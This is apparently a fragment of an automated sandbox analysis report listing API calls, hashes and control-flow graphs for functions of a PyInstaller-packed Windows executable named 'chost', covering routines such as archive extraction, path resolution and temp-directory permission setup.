                                                                                                                                                                                                                                        • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                        • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                        • Opcode ID: 5203fde90a14cfca52878d148793ed0f56fa2f4a03ba52266beea290f2c18543
                                                                                                                                                                                                                                        • Instruction ID: f813a1856acce7d8b3ba131ce072bca2542d7676ce791fc6517b6d2ab97eca0e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5203fde90a14cfca52878d148793ed0f56fa2f4a03ba52266beea290f2c18543
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2751A022A0864381EA71AF37A4913BE76A1EF85794F948179ED8DC77D5EE3CE501C700

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF69437F11A,?,?,-00000018,00007FF69437ADC3,?,?,?,00007FF69437ACBA,?,?,?,00007FF694375FAE), ref: 00007FF69437EEFC
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF69437F11A,?,?,-00000018,00007FF69437ADC3,?,?,?,00007FF69437ACBA,?,?,?,00007FF694375FAE), ref: 00007FF69437EF08
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                        • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                        • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                        • Instruction ID: 8d67b55a8ae088118a163dd5005bf77d52e70ad4ae254cfddca917fc283f9476
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D241CC72B1DA12C1FA25CB27988567522A1FF48B90F98897DED5EC7B94EE3CE404C300

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,00007FF694363804), ref: 00007FF6943636E1
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF694363804), ref: 00007FF6943636EB
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694362C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF694363706,?,00007FF694363804), ref: 00007FF694362C9E
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694362C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF694363706,?,00007FF694363804), ref: 00007FF694362D63
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694362C50: MessageBoxW.USER32 ref: 00007FF694362D99
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                        • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                        • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                        • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                        • Instruction ID: ad89d284a4f32fd5033b4908fd792bae1f8a9b69c2725c3d8090cf31d9438c3b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D5218361B1864381FA309733EC963BA7250FF88394F40817EE65DC26D5EE2CE505C700

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 744 7ff69437bacc-7ff69437baf2 745 7ff69437bb0d-7ff69437bb11 744->745 746 7ff69437baf4-7ff69437bb08 call 7ff694374f58 call 7ff694374f78 744->746 748 7ff69437bee7-7ff69437bef3 call 7ff694374f58 call 7ff694374f78 745->748 749 7ff69437bb17-7ff69437bb1e 745->749 762 7ff69437befe 746->762 768 7ff69437bef9 call 7ff69437a950 748->768 749->748 751 7ff69437bb24-7ff69437bb52 749->751 751->748 754 7ff69437bb58-7ff69437bb5f 751->754 757 7ff69437bb78-7ff69437bb7b 754->757 758 7ff69437bb61-7ff69437bb73 call 7ff694374f58 call 7ff694374f78 754->758 760 7ff69437bee3-7ff69437bee5 757->760 761 7ff69437bb81-7ff69437bb87 757->761 758->768 765 7ff69437bf01-7ff69437bf18 760->765 761->760 766 7ff69437bb8d-7ff69437bb90 761->766 762->765 766->758 769 7ff69437bb92-7ff69437bbb7 766->769 768->762 772 7ff69437bbea-7ff69437bbf1 769->772 773 7ff69437bbb9-7ff69437bbbb 769->773 777 7ff69437bbc6-7ff69437bbdd call 7ff694374f58 call 7ff694374f78 call 7ff69437a950 772->777 778 7ff69437bbf3-7ff69437bc1b call 7ff69437d66c call 7ff69437a9b8 * 2 772->778 775 7ff69437bbbd-7ff69437bbc4 773->775 776 7ff69437bbe2-7ff69437bbe8 773->776 775->776 775->777 781 7ff69437bc68-7ff69437bc7f 776->781 809 7ff69437bd70 777->809 805 7ff69437bc1d-7ff69437bc33 call 7ff694374f78 call 7ff694374f58 778->805 806 7ff69437bc38-7ff69437bc63 call 7ff69437c2f4 778->806 784 7ff69437bcfa-7ff69437bd04 call 7ff69438398c 781->784 785 7ff69437bc81-7ff69437bc89 781->785 797 7ff69437bd0a-7ff69437bd1f 784->797 798 7ff69437bd8e 784->798 785->784 786 7ff69437bc8b-7ff69437bc8d 785->786 786->784 790 7ff69437bc8f-7ff69437bca5 786->790 790->784 794 7ff69437bca7-7ff69437bcb3 790->794 794->784 799 7ff69437bcb5-7ff69437bcb7 794->799 797->798 803 7ff69437bd21-7ff69437bd33 GetConsoleMode 797->803 801 7ff69437bd93-7ff69437bdb3 ReadFile 798->801 799->784 804 7ff69437bcb9-7ff69437bcd1 799->804 807 7ff69437bead-7ff69437beb6 GetLastError 801->807 808 7ff69437bdb9-7ff69437bdc1 801->808 803->798 810 7ff69437bd35-7ff69437bd3d 803->810 804->784 814 7ff69437bcd3-7ff69437bcdf 804->814 805->809 806->781 811 7ff69437beb8-7ff69437bece call 7ff694374f78 call 7ff694374f58 807->811 812 7ff69437bed3-7ff69437bed6 807->812 808->807 816 7ff69437bdc7 808->816 813 7ff69437bd73-7ff69437bd7d call 7ff69437a9b8 809->813 810->801 818 7ff69437bd3f-7ff69437bd61 ReadConsoleW 810->818 811->809 822 7ff69437bedc-7ff69437bede 812->822 823 7ff69437bd69-7ff69437bd6b call 7ff694374eec 812->823 813->765 814->784 821 7ff69437bce1-7ff69437bce3 814->821 825 7ff69437bdce-7ff69437bde3 816->825 827 7ff69437bd63 GetLastError 818->827 828 7ff69437bd82-7ff69437bd8c 818->828 821->784 832 7ff69437bce5-7ff69437bcf5 821->832 822->813 823->809 825->813 834 7ff69437bde5-7ff69437bdf0 825->834 827->823 828->825 832->784 837 7ff69437be17-7ff69437be1f 834->837 838 7ff69437bdf2-7ff69437be0b call 7ff69437b6e4 834->838 839 7ff69437be9b-7ff69437bea8 call 7ff69437b524 837->839 840 7ff69437be21-7ff69437be33 837->840 846 7ff69437be10-7ff69437be12 838->846 839->846 843 7ff69437be35 840->843 844 7ff69437be8e-7ff69437be96 840->844 847 7ff69437be3a-7ff69437be41 843->847 844->813 846->813 849 7ff69437be7d-7ff69437be88 847->849 850 7ff69437be43-7ff69437be47 847->850 849->844 851 7ff69437be49-7ff69437be50 850->851 852 7ff69437be63 850->852 851->852 853 7ff69437be52-7ff69437be56 851->853 854 7ff69437be69-7ff69437be79 852->854 853->852 855 7ff69437be58-7ff69437be61 853->855 854->847 856 7ff69437be7b 854->856 855->854 856->844
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
                                                                                                                                                                                                                                        • Instruction ID: f35ae2f852899ba6825a8f000d08fe4bf3190da51a1e29e64bd24893fb08b0eb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7C1C232A0C686C1E7709B3794802BD7A64EB81B98F55C1B9EA8E877D1CE7CE445C700

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 995526605-0
                                                                                                                                                                                                                                        • Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                                                                                                                                                        • Instruction ID: 9af662ae11957c42ee49bd39f2cb39d3d3b47e81e672457a31fff84a219f86f5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A212131A0C64342EA249B76F4D522AB7A0EB857E4F108279E6ADC3BE5DF6CD445C740

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694368760: GetCurrentProcess.KERNEL32 ref: 00007FF694368780
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694368760: OpenProcessToken.ADVAPI32 ref: 00007FF694368793
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694368760: GetTokenInformation.KERNELBASE ref: 00007FF6943687B8
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694368760: GetLastError.KERNEL32 ref: 00007FF6943687C2
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694368760: GetTokenInformation.KERNELBASE ref: 00007FF694368802
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694368760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF69436881E
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694368760: CloseHandle.KERNEL32 ref: 00007FF694368836
                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00007FF694363C55), ref: 00007FF69436916C
                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00007FF694363C55), ref: 00007FF694369175
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                        • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                        • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                        • Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                                        • Instruction ID: 835401d8814f9f9f324a306e95aec387caf947763fc2ced7ac8516c4d305421c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84214F21A1874382F724AB32E9962EA7365FF88780F5480B9EA4DD3796DF3CD845C740

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 963 7ff69437cfd0-7ff69437cff5 964 7ff69437cffb-7ff69437cffe 963->964 965 7ff69437d2c3 963->965 966 7ff69437d037-7ff69437d063 964->966 967 7ff69437d000-7ff69437d032 call 7ff69437a884 964->967 968 7ff69437d2c5-7ff69437d2d5 965->968 970 7ff69437d065-7ff69437d06c 966->970 971 7ff69437d06e-7ff69437d074 966->971 967->968 970->967 970->971 973 7ff69437d076-7ff69437d07f call 7ff69437c390 971->973 974 7ff69437d084-7ff69437d099 call 7ff69438398c 971->974 973->974 978 7ff69437d1b3-7ff69437d1bc 974->978 979 7ff69437d09f-7ff69437d0a8 974->979 981 7ff69437d210-7ff69437d235 WriteFile 978->981 982 7ff69437d1be-7ff69437d1c4 978->982 979->978 980 7ff69437d0ae-7ff69437d0b2 979->980 983 7ff69437d0b4-7ff69437d0bc call 7ff694374830 980->983 984 7ff69437d0c3-7ff69437d0ce 980->984 985 7ff69437d237-7ff69437d23d GetLastError 981->985 986 7ff69437d240 981->986 987 7ff69437d1fc-7ff69437d20e call 7ff69437ca88 982->987 988 7ff69437d1c6-7ff69437d1c9 982->988 983->984 992 7ff69437d0d0-7ff69437d0d9 984->992 993 7ff69437d0df-7ff69437d0f4 GetConsoleMode 984->993 985->986 995 7ff69437d243 986->995 1010 7ff69437d1a0-7ff69437d1a7 987->1010 989 7ff69437d1cb-7ff69437d1ce 988->989 990 7ff69437d1e8-7ff69437d1fa call 7ff69437cca8 988->990 996 7ff69437d254-7ff69437d25e 989->996 997 7ff69437d1d4-7ff69437d1e6 call 7ff69437cb8c 989->997 990->1010 992->978 992->993 1000 7ff69437d1ac 993->1000 1001 7ff69437d0fa-7ff69437d100 993->1001 1003 7ff69437d248 995->1003 1004 7ff69437d2bc-7ff69437d2c1 996->1004 1005 7ff69437d260-7ff69437d265 996->1005 997->1010 1000->978 1008 7ff69437d189-7ff69437d19b call 7ff69437c610 1001->1008 1009 7ff69437d106-7ff69437d109 1001->1009 1011 7ff69437d24d 1003->1011 1004->968 1012 7ff69437d267-7ff69437d26a 1005->1012 1013 7ff69437d293-7ff69437d29d 1005->1013 1008->1010 1016 7ff69437d10b-7ff69437d10e 1009->1016 1017 7ff69437d114-7ff69437d122 1009->1017 1010->1003 1011->996 1018 7ff69437d26c-7ff69437d27b 1012->1018 1019 7ff69437d283-7ff69437d28e call 7ff694374f34 1012->1019 1020 7ff69437d2a4-7ff69437d2b3 1013->1020 1021 7ff69437d29f-7ff69437d2a2 1013->1021 1016->1011 1016->1017 1022 7ff69437d124 1017->1022 1023 7ff69437d180-7ff69437d184 1017->1023 1018->1019 1019->1013 1020->1004 1021->965 1021->1020 1025 7ff69437d128-7ff69437d13f call 7ff694383a58 1022->1025 1023->995 1029 7ff69437d177-7ff69437d17d GetLastError 1025->1029 1030 7ff69437d141-7ff69437d14d 1025->1030 1029->1023 1031 7ff69437d16c-7ff69437d173 1030->1031 1032 7ff69437d14f-7ff69437d161 call 7ff694383a58 1030->1032 1031->1023 1034 7ff69437d175 1031->1034 1032->1029 1036 7ff69437d163-7ff69437d16a 1032->1036 1034->1025 1036->1031
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69437CFBB), ref: 00007FF69437D0EC
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69437CFBB), ref: 00007FF69437D177
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 953036326-0
                                                                                                                                                                                                                                        • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                        • Instruction ID: 2e69c92b5fee76b3c9db045bb972130a1e9932fa3c44fae0c288559885190782
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE919132E2C652C5F7709F7694C02BD2BA0EB44B98F14817DDE8EA7A85DE38D442C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1279662727-0
                                                                                                                                                                                                                                        • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                        • Instruction ID: 1215b2d575163631c1e5e14db798a04ecb381d9b9d5665166299f9f957a8589e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35419232D1C782C3E2689B3295903696360FB947A4F10D379EA9C83ED6DF6CA4E0C740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3251591375-0
                                                                                                                                                                                                                                        • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                        • Instruction ID: 854a63cb4f7dda085c4bfc935009b4dd2d234d1d3f13c8418eb7930821cafe21
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B310320E0C24391FA74AB7794A33B93691EF46384F44C4BDEA4ECB2D7DE2EA405C650
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                        • Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                                        • Instruction ID: da69d428a665601bec5a592c3c4b73f8beb6ca6fd9776b0126fb315f70ca5753
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5CD06720B0974682FA642B7658D90786251EF49B51B1495BCD85FDA397ED6CA449C300
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
